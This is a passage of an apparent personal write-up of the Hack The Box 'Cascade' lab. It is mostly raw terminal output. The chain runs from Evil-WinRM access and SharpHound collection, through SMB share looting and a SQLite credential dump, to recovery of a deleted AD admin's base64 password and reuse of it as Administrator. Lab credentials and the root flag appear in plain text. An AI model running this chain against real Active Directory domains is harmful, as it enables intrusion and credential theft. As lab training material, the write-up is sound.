└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /home/kali/HTB/cascade/SharpHound.exe
Info: Uploading /home/kali/HTB/cascade/SharpHound.exe to C:\Users\s.smith\Documents\SharpHound.exe
Data: 1111380 bytes of 1111380 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2023 12:51 AM 833536 SharpHound.exe
*Evil-WinRM* PS C:\Users\s.smith\Documents> ./SharpHound.exe
------------------------------------------------
Initializing SharpHound at 12:55 AM on 9/13/2023
------------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain CASCADE.LOCAL using path CN=Schema,CN=Configuration,DC=CASCADE,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 18 MB RAM
Status: 81 objects finished (+81 Infinity)/s -- Using 26 MB RAM
Enumeration finished in 00:00:00.4488100
Compressing data to .\20230913005544_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 12:55 AM on 9/13/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2023 12:55 AM 9940 20230913005544_BloodHound.zip
-a---- 9/13/2023 12:55 AM 14433 OTJmMzFjYTUtNzc3NS00YWZjLWEyODgtYTY3MDg2YzBiNzgx.bin
-a---- 9/13/2023 12:51 AM 833536 SharpHound.exe
*Evil-WinRM* PS C:\Users\s.smith\Documents> download 20230913005544_BloodHound.zip
Info: Downloading C:\Users\s.smith\Documents\20230913005544_BloodHound.zip to 20230913005544_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents>
started neo4j and ran bloodhound and imported the zip
Going to try aclpwn and see if it gets anything
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ ~/.local/bin/aclpwn -f [email protected] -t cascade.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.182 -sp sT333ve2
[!] No path found!
┌──(kali㉿kali)-[~/HTB/cascade]
check what groups s.smith is in
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/28/2020 8:58:05 PM
Password expires Never
Password changeable 1/28/2020 8:58:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script MapAuditDrive.vbs
User profile
Home directory
Last logon 1/29/2020 12:26:39 AM
Logon hours allowed All
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name Audit Share
Comment \\Casc-DC1\Audit$
Members
-------------------------------------------------------------------------------
s.smith
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup IT
Alias name IT
Comment
Members
-------------------------------------------------------------------------------
arksvc
r.thompson
s.smith
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Remote Management Use"
net.exe : System error 1376 has occurred.
+ CategoryInfo : NotSpecified: (System error 1376 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The specified local group does not exist.
use crackmap exec to get into the shares by s.smith
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$ READ
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
We have read to audit. we try and get to it which we do and i have downloaded all the files to my kali
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1625087 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1625087 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: \DB\> get CascAudit.exe
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \DB\CascAudit.exe
smb: \DB\> cd ../
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (9.3 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (129.4 KiloBytes/sec) (average 50.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (37.8 KiloBytes/sec) (average 45.5 KiloBytes/sec)
smb: \> cd x64
smb: \x64\> ls
. D 0 Sun Jan 26 17:25:27 2020
.. D 0 Sun Jan 26 17:25:27 2020
SQLite.Interop.dll A 1639936 Sun Oct 27 02:39:20 2019
6553343 blocks of size 4096. 1624828 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (264.6 KiloBytes/sec) (average 116.5 KiloBytes/sec)
smb: \x64\> cd ../x86
smb: \x86\> ls
. D 0 Sun Jan 26 17:25:27 2020
.. D 0 Sun Jan 26 17:25:27 2020
SQLite.Interop.dll A 1246720 Sun Oct 27 02:34:20 2019
6553343 blocks of size 4096. 1624828 blocks available
smb: \x86\>
Going to try reading the database and have asked chatGPT how 🙂
sudo apt update
sudo apt install sqlite3
sqlite3 audit.db
.tables
SELECT * FROM DeletedUserAudit;
└─$ sqlite3 Audit.db
SQLite version 3.42.0 2023-05-16 12:36:15
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> SELECT * FROM Misc;
sqlite>
``
we can check the groups that ArkSvc is in
```bash
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents>
i asked chatGPT about this output
Based on the information provided, there are a few key points of interest regarding the ArkSvc user:
Local Group Memberships:
AD Recycle Bin: This is intriguing because if this user has rights to access the Active Directory (AD) Recycle Bin, they may be able to recover deleted AD objects. This could lead to potential privilege escalation or information disclosure vulnerabilities.
I asked chatGPT how to eneumerate further and tips from evil-winrm. But we first need the password
Load the Active Directory Module: — Import-Module ActiveDirectory
Enumerate the Deleted Objects: – Get-ADObject -Filter ‘isDeleted -eq $true -and name -ne “Deleted Objects”‘ -IncludeDeletedObjects -Property *
Restore a Deleted Object (if needed): –$deletedUser = Get-ADObject -Filter ‘SamAccountName -eq “desired_username”‘ -IncludeDeletedObjects
Restore-ADObject -Identity $deletedUser.ObjectGuid
how to read the dll via kali using dnspy- Tips from chatGPT
wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y apt-transport-https
sudo apt-get update
sudo apt-get install -y dotnet-sdk-3.1
Download and unzip dnspy — https://github.com/0xd4d/dnSpy/releases
unzip dnSpy-netcore-win64.zip
run dnspy
cd dnSpy-netcore-win64
dotnet dnSpy.dll
Strugled with the above but found the password can be decrypted with some custom script on the internet for this box. The password is w3lc0meFr31nd
we try and run the previous commands in evilwinr
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
At the bottom we can see the tempadmin account
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
we can see password – YmFDVDNyMWFOMDBkbGVz. we try to decode as base64
┌──(kali㉿kali)-[~]
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
┌──(kali㉿kali)-[~]
└─$
Because in the email there was mention that they share the same password with the administrato, we test the password
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec winrm 10.10.10.182 -u Administrator -p baCT3r1aN00dles
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
pawned
d-r--- 1/28/2020 6:26 PM Documents
d-r--- 1/26/2020 11:56 PM Downloads
d-r--- 1/26/2020 11:56 PM Favorites
d-r--- 1/26/2020 11:56 PM Links
d-r--- 1/26/2020 11:56 PM Music
d-r--- 1/26/2020 11:56 PM Pictures
d-r--- 1/26/2020 11:56 PM Saved Games
d-r--- 1/26/2020 11:56 PM Searches
d-r--- 1/26/2020 11:56 PM Videos
-a---- 3/25/2020 11:17 AM 645729 wds_current_setup.exe
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/13/2023 12:27 AM 34 root.txt
c*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e9f7e5fccd0b570fffadd6190b3282f4